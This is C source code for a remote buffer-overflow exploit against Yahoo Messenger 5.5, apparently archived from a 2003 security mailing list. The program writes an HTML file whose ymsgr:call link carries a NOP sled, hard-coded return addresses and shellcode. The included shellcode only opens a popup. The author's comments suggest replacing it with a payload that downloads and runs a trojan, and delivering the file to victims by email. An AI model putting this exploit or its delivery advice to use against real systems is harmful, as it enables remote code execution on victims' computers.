/* Yahpoo.c by bobat_private [www.dtors.net] [DSR] * * Why Yahoo Messenger have not fixed this vulnerbility * I dont know...but either way they are stupid! * * This exploit has been tested on: * Yahoo Messenger 5,5,0,1246 * Yahoo Module 5,5,0,454 * * For: * Windows 2000 Professional 5.0.2195 SP3 * * Raveat_private has released a windows [exe] version of this * exploit but for Windows XP Pro SP1. * So both targets are vulnerable XP/2k...some addresses might need changing. * * Problems that may occur: * * The addresses used may vary from box to box..so they might need changing. * The stack may keep on changing the location of your shellcode address..you * need to hit a static sector that will not alternate. [this is the reason we jmp] * There exist two crashes...the first one we bypass..this is the access violation * when you hit the nop sled the first time round. The second crash is where we * hit the nop sled...so dont get confused between the 2. * * The shellcode used here...will not do anything malicious..just opens a popup box * You can change this shellcode to something else...but the buffer is not very big * so there is no chance of a bind shell or anything. * Sloth from nopninjas.com has a shellcode that will download a trojan * and execute it. Nice and small as well ;) * * Thats about it...this exploit will lead to remote command execution on the * victim. Bare in mind this is triggered via bad URI handling...and the victim * needs to actually view the evil html file..this can be done automatically via * email >:) * * Big Lovin to rica. * Thanks to rave for his time. * Greetz: * mercy, Redg, opy, phreez, eSDee, ilja, looney, The_itch, angelo, inv, kokanin, * macd, SiRVu|can, Sally, Lucipher, gloomy, phaze, uproot, b0f. * special thanks to sloth@nopninjas * * * bobat_private www.dtors.net */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define MessageBoxA "\x1d\x97\x53\x01" char ret[8]= "\xD5\x96\x7A\x01"; unsigned char win32_msgbox[] = { "\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA "\x2D\x01\x01" "\x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\xE2\xFF\xFF\xFF" "\x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" }; int main(int argc,char *argv[]) { FILE *evil; char *shellcode = win32_msgbox; unsigned char buffer[5000]; int offset=320; fprintf(stdout, "\n\tYahPoo.c By bob.\n"); fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n"); fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n\n"); fprintf(stdout,"Makin' da EbUL HTML File... "); if ((evil =fopen("yahoo.html","w"))==NULL){ fprintf(stderr,"Failed\n"); exit(1); } else { fprintf(stderr,"Opened!\n"); } memset(buffer,0x00,offset+32+strlen(shellcode)); memset(buffer,0x90,offset); memcpy(buffer+offset,ret,4); memcpy(buffer+offset+4,shellcode,strlen(shellcode)); buffer[264] = 0xD4; //address of &shellcode buffer[265] = 0x96; buffer[266] = 0x7A; buffer[267] = 0x01; buffer[272] = 0xF5; //jmp 0xc [msvcrt.dll] buffer[273] = 0x01; buffer[274] = 0x01; buffer[275] = 0x78; fprintf(evil,"<html>"); fprintf(evil,"<title>Bought to you by dtors.net!</title>\n"); fprintf(evil,"<B>Dtors Security Research (DSR)</B>\n"); fprintf(evil,"<p>Yahoo Messenger 5.5 exploit....</p>\n"); fprintf(evil,"<pre>"); fprintf(evil,"<a href=%cymsgr:call?%s%c>!EbUL Link!</a></body></pre></html>\x00\x00\x00",0x22,buffer,0x22); fclose(evil); // <-- closing yahoo.html fprintf(stdout,"\nDa ebUL HTML file is >>yahoo.html<<\nEnjoy!\nwww.dtors.net\n\n"); }
This archive was generated by hypermail 2b30 : Sat Jul 12 2003 - 12:26:46 PDT